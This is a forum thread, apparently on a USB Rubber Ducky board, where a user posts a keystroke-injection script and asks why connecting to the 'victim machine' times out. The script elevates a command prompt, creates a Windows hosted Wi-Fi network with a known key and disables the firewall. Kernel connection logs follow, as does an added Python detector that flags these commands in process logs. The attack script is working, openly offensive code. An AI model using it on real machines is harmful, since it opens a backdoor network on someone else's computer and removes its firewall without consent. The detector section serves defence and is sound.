michael_kent123 Posted May 8, 2014 (edited)

Hello,

I have a problem with the following ducky script.

DELAY 3000
GUI r
DELAY 2000
STRING powershell Start-Process cmd -Verb runAs
DELAY 1000
ENTER
DELAY 10000
LEFTARROW
ENTER
DELAY 2000
STRING netsh wlan set hostednetwork mode=allow ssid=network key=whatever
ENTER
DELAY 2000
STRING netsh wlan start hostednetwork
ENTER
DELAY 2000
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING exit
ENTER

I do what Darren does in "What's Up With the Duck?": The duck script seems to work on the target machine. The network 'network' is created. However, when I connect to 'network' from my machine and enter the password, the connection always times out.

This is what a successful connection from me to my AP looks like:

[68488.324824] wlan0: authenticate with b1:cd:00:12:a7:88
[68488.332390] wlan0: send auth to b1:cd:00:12:a7:88 (try 1/3)
[68488.334924] wlan0: authenticated
[68488.338097] wlan0: associate with b1:cd:00:12:a7:88 (try 1/3)
[68488.341976] wlan0: RX AssocResp from b1:cd:00:12:a7:88 (capab=0x411 status=0 aid=2)
[68488.352677] wlan0: associated
[68488.352980] cfg80211: Calling CRDA for country: AL
[68488.362972] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)
[68488.362978] cfg80211: Regulatory domain changed to country: AL
[68488.362979] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[68488.362981] cfg80211: (2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm)
[...]

I disconnect deliberately:

[68529.914912] wlan0: deauthenticating from b1:cd:00:12:a7:88 by local choice (reason=3)
[68529.970614] cfg80211: All devices are disconnected, going to restore regulatory settings
[68529.970621] cfg80211: Restoring regulatory settings

Here is what happens when I connect to 'network'.

[69302.952696] wlan0: authenticate with 21:32:12:7a:40:42
[69302.968746] wlan0: send auth to 21:32:12:7a:40:42 (try 1/3)
[69302.970611] wlan0: authenticated
[69302.971105] wlan0: associate with 21:32:12:7a:40:42 (try 1/3)
[69302.981330] wlan0: RX AssocResp from 21:32:12:7a:40:42 (capab=0x431 status=0 aid=1)
[69302.992791] wlan0: associated
[69302.993017] cfg80211: Calling CRDA for country: AL
[69302.999402] cfg80211: Updating information on frequency 2412 MHz for a 20 MHz width channel with regulatory rule:
[69302.999408] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)
[...]

I am deauthenticated involuntarily:

[69348.297397] wlan0: deauthenticating from 21:32:12:7a:40:42 by local choice (reason=3)
[69348.373035] cfg80211: All devices are disconnected, going to restore regulatory settings
[69348.373042] cfg80211: Restoring regulatory settings

I don't see any difference between a successful connection to my AP and an unsuccessful connection to the target machine. The target is a Windows 8 box.

Does anyone know why I cannot connect to 'network'? Thanks!

Edited May 8, 2014 by michael_kent123

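For defenders, the commands typed by the script in the post above show up in process-creation logging, and the short, fixed gaps between them are typical of injected keystrokes. The following is an added example, not part of the original thread: it flags a host where hosted-network setup and the firewall disable occur within a short window. The event tuple format, host names, timestamps and the 60-second window are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Patterns taken from the commands in the script posted above.
STAGES = {
    "elevate": re.compile(r"start-process\s+cmd\s+-verb\s+runas"),
    "hostednet_config": re.compile(r"netsh\s+wlan\s+set\s+hostednetwork\b.*\bmode=allow"),
    "hostednet_start": re.compile(r"netsh\s+wlan\s+start\s+hostednetwork"),
    "firewall_off": re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable"),
}
REQUIRED = {"hostednet_config", "hostednet_start", "firewall_off"}

def classify(cmdline):
    """Return the stage name a command line matches, or None."""
    norm = " ".join(cmdline.lower().split())  # fold case, collapse whitespace
    for stage, pattern in STAGES.items():
        if pattern.search(norm):
            return stage
    return None

def find_chains(events, window=60.0):
    """events: iterable of (epoch_seconds, host, cmdline) (assumed format).
    Return {host: [stages]} where all REQUIRED stages fall inside `window`."""
    per_host = defaultdict(list)
    for ts, host, cmd in sorted(events):
        stage = classify(cmd)
        if stage:
            per_host[host].append((ts, stage))
    hits = {}
    for host, seen in per_host.items():
        for i, (start, _) in enumerate(seen):
            in_window = [s for t, s in seen[i:] if t - start <= window]
            if REQUIRED <= set(in_window):
                hits[host] = in_window
                break
    return hits

# Constructed sample events: host names and timestamps are made up.
SAMPLE = [
    (100.0, "PC-A", "powershell Start-Process cmd -Verb runAs"),
    (113.0, "PC-A", "netsh wlan set hostednetwork mode=allow ssid=network key=whatever"),
    (115.0, "PC-A", "netsh  WLAN start hostednetwork"),
    (117.0, "PC-A", "netsh firewall set opmode disable"),
    (200.0, "PC-B", "netsh wlan show hostednetwork"),      # read-only query
    (900.0, "PC-C", "netsh wlan start hostednetwork"),     # isolated, no config
    (5000.0, "PC-C", "netsh firewall set opmode disable"),  # far outside window
]

print(find_chains(SAMPLE))
```

Only PC-A is reported: PC-B ran a read-only query, and PC-C's two commands are over an hour apart with no hosted-network configuration step.
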
michael_kent123 (Author) Posted May 10, 2014

Just to expand on the above. I have used the ducky code successfully on one Windows 8 machine. The script creates a network which I connect to (with a Blackberry) and receive a 192.168.x.x address.

However, on another Windows 8 machine, the script also creates the network. Yet, whenever I try to connect to the network from my Ubuntu machine, I can never obtain a connection. I also try via the Blackberry but it also will not connect. It just times out / deauthenticates itself.

When the script runs on the second Windows machine, all looks fine. I see the commands being run and accepted in the Windows terminal.

Does anyone have any ideas? Why would it work on one Windows but not on the other?

overwraith Posted May 11, 2014

"Windows undocumented features". Seriously though, I have no idea.

michael_kent123 (Author) Posted May 13, 2014

Perhaps I am missing something obvious. I run the script on the target. This creates the new wireless network. On my machine, I disconnect from whatever network I am connected to. I then connect to the new wireless network created on the victim machine. Is this correct? Thanks.